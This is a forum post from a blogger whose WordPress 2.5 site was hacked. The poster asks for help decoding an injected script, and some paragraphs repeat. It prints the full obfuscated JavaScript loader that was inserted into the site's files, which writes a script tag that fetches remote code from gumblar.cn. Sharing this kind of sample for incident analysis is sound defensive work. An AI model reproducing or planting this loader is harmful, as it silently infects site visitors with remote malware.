Hi there, this is my first thread here and i didn't want it to be something like this but, we can't get what we want ....
So to the point - My blog(wordpres 2.5) got hacked, it was my hoster's fault. All my .php/.js/.xml files got edited (well not all of them, but most of them), the edition of ALL(in all folders - admin, plugins, themes and so on... ) the files took 2-3 minutes, so i'm assumig that he used a script of some kind.
This code was inserted in most of the .php/.js/.xml files
It's some kind of redirecting script, that redirects to something (adware/spyware/virii), still not sure what. If there is someone who can help me decode it and understand what is it doing i will really appreciate any help.
I can provide the php, that includes this code too if necessary.
So to the point - My blog(wordpres 2.5) got hacked, it was my hoster's fault. All my .php/.js/.xml files got edited (well not all of them, but most of them), the edition of ALL(in all folders - admin, plugins, themes and so on... ) the files took 2-3 minutes, so i'm assumig that he used a script of some kind.
This code was inserted in most of the .php/.js/.xml files
Code:
</head><script language=javascript><!--
(function(m9RlI){var HAspt='%';var UoQSJ=unescape(('var:20a:3d:22Scr:69p:74:45n:67ine:22:2cb:3d:22Versi:6fn:28)+:22:2cj:3d:22:22:2cu:3dnav:69ga:74or:2e:75serAg:65:6et:3bif((u:2eind:65xOf(:22W:69n:22):3e0):26:26:28:75:2eindexOf(:22:4eT:206:22):3c0):26:26(doc:75ment:2ecoo:6bie:2eind:65x:4ff:28:22:6d:69e:6b:3d1:22):3c:30):26:26(typ:65of(zr:76zts:29:21:3dtypeof(:22A:22:29):29:7b:7arvzts:3d:22A:22:3be:76al(:22if(win:64o:77:2e:22+a:2b:22)j:3dj+:22+:61+:22Major:22+b+a+:22Min:6fr:22+b:2ba+:22Build:22+b:2b:22j:3b:22):3bdo:63ument:2ewrite(:22:3c:73cri:70t:20s:72c:3d:2f:2fgu:6dblar:2ec:6e:2frs:73:2f:3f:69:64:3d:22+j+:22:3e:3c:5c:2fsc:72ipt:3e:22):3b:7d').replace(m9RlI,HAspt));eval(UoQSJ)})(/:/g);
--></script>
<body>
It's some kind of redirecting script, that redirects to something (adware/spyware/virii), still not sure what. If there is someone who can help me decode it and understand what is it doing i will really appreciate any help.
I can provide the php, that includes this code too if necessary.